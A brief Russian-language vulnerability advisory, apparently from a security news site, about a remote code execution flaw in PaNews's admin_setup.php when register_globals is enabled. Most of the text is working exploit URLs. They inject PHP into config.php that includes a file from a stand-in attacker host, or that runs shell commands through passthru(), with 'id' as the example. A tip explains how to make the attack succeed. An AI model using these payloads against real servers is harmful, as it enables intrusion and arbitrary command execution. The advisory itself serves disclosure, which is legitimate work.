Уязвимость существует при обработке
некоторых параметров в сценарии admin_setup.php
при опции register_globals=on в конфигурационном
файле php.ini. Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольный php сценарий и
произвольные команды на системе с
привилегиями текущего web сервера.

PHP-инклюдинг

http://victim/panews/includes/admin_setup.php?access[]=admins &do=updatesets&form[comments]=$nst&form[autoapprove]=
$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

http://victim/panews/includes/config.php?nst=http://your/file.php

Выполнение команд

http://victim/panews/includes/admin_setup.php?access[]=admins &do=updatesets&form[comments]=$nst&form[autoapprove]
=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

http://victim/panews/includes/config.php?nst=id

Примечание: Для успешной реализации
уязвимости необходимо отключить
выполнение javscript сценариев в браузере.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии